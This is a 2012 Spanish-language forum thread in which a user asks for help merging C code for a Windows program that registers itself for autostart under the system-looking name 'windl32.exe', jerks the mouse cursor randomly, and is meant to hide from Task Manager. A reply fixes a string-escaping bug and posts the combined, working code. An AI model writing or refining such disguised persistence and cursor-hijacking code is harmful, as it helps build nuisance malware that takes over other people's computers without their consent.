elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  Problema con Dev C++
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problema con Dev C++  (Leído 2,333 veces)
Netflash

Desconectado Desconectado

Mensajes: 12



Ver Perfil
Problema con Dev C++
« en: 18 Septiembre 2012, 19:50 pm »

Estoy creando un programa en Dev C++ que tienes estas funciones pero hay un problema  :-\,

- Que se agregue al registro
  
-  Mueva el raton aleatoriamente

- Ocultarse del administrador de tareas

- i otras funciones que tengo

De momento tengo el codigo de agregarse al registro:


Citar
#include <windows.h>

int main()
{
HKEY hkey;
RegOpenKeyEx
(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0,KEY_SET_VALUE,&hkey);
RegSetValueEx(hkey,"windl32",0,REG_SZ,(const unsigned char*)"I:\windl32.exe",sizeof"I:\windl32.exe");        
RegCloseKey(hkey);
}
 

Y el de mover la rata

Citar
#include <windows.h>

int main()
{
    FreeConsole();
    srand(GetTickCount());



    int nWidth  = GetSystemMetrics(SM_CXSCREEN) - 1;
    int nHeight = GetSystemMetrics(SM_CYSCREEN) - 1;


    
        while(!GetAsyncKeyState(VK_F8)){
        SetCursorPos((rand() % nWidth) + 1, (rand() % nHeight) + 1);
        Sleep(5);


    }
    return 0;


}



Al momento de juntar estas dos funciones pues me tira un error de compilación, ya llevo varios dias buscando y no logro encontrar esta solucion....



En línea





ankora45

Desconectado Desconectado

Mensajes: 52



Ver Perfil
Re: Problema con Dev C++
« Respuesta #1 en: 18 Septiembre 2012, 20:07 pm »

Sinceramente creo que estan bien pero si utilizas dev-c++ pasate a code::blocks ya que usa un compilador diferente perop no me hagas muxo caso


En línea

Hay dos cosas infinitas en este mundo, el universo y la estupidez humana, y de la primera no estoy muy seguro
0xDani


Desconectado Desconectado

Mensajes: 1.077



Ver Perfil
Re: Problema con Dev C++
« Respuesta #2 en: 18 Septiembre 2012, 20:40 pm »

Sinceramente creo que estan bien pero si utilizas dev-c++ pasate a code::blocks ya que usa un compilador diferente perop no me hagas muxo caso

El dev-c++ usa el compilador de borland, y el code::blocks el mingw, que es una adaptacion del gcc a windows, segun tengo entendido. Eso por defecto claro, supongo que ambos se pueden configurar. En cuanto a la pregunta del tema, yo no la voy a responder porque no entiendo de la API de windows, pero te aconsejo que pongas la salida del compilador, asi seguramente te contestara mas gente.

Saludos.

PD: Dev-c++ es un proyecto abandonado.
En línea

I keep searching for something that I never seem to find, but maybe I won't, because I left it all behind!

I code for $$$
Hago trabajos en C/C++
Contactar por PM
SokarTefnut

Desconectado Desconectado

Mensajes: 124



Ver Perfil
Re: Problema con Dev C++
« Respuesta #3 en: 20 Septiembre 2012, 11:18 am »

Acabo de incluirlo en un archivo,compilarlo y ejecutarlo, funciona, aunque habia un error.
Compilando con GCC :

ERROR: Aviso; secuencia de escape desconocida '\w' en la linea 61

el problema estaba en que en el programa original estas usando I:\windl32.exe, y hay que
utilizar la doble barra I:\\windl32.exe





#include <windows.h>

int main()
{
    RegFuncion();
   SaltaRaton();
}

RegFuncion(void)
{
HKEY hkey;
RegOpenKeyEx
(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0,KEY_SET_VALUE,&hkey);
RegSetValueEx(hkey,"windl32",0,REG_SZ,(const unsigned char*)"I:\\windl32.exe",sizeof"I:\\windl32.exe");       
RegCloseKey(hkey);
return;
}

SaltaRaton(void)
{
 FreeConsole();
 srand(GetTickCount());
    int nWidth  = GetSystemMetrics(SM_CXSCREEN) - 1;
    int nHeight = GetSystemMetrics(SM_CYSCREEN) - 1;
   
        while(!GetAsyncKeyState(VK_F8)){
        SetCursorPos((rand() % nWidth) + 1, (rand() % nHeight) + 1);
        Sleep(5);

    }
   }
En línea

"Saber romper medidas de seguridad no hace que seas hacker, al igual que saber hacer un puente en un coche no te convierte en un ingeniero de automoción"
-- Eric Raymond -- http://en.wikipedia.org/wiki/Eric_S._Raymond
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema BlueZScanner y problema de conexión
Hacking Mobile
Kasswed 3 6,308 Último mensaje 6 Mayo 2006, 22:04 pm
por Gospel
Problema Css o problema con el sidebar
Desarrollo Web
gaboomsk8 6 3,568 Último mensaje 27 Diciembre 2011, 21:56 pm
por gaboomsk8
Problema con una App
Java
TickTack 2 2,054 Último mensaje 5 Junio 2020, 11:33 am
por TickTack
problema con HUB
Hardware
General Dmitry Vergadoski 2 1,895 Último mensaje 22 Septiembre 2021, 19:36 pm
por el-brujo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines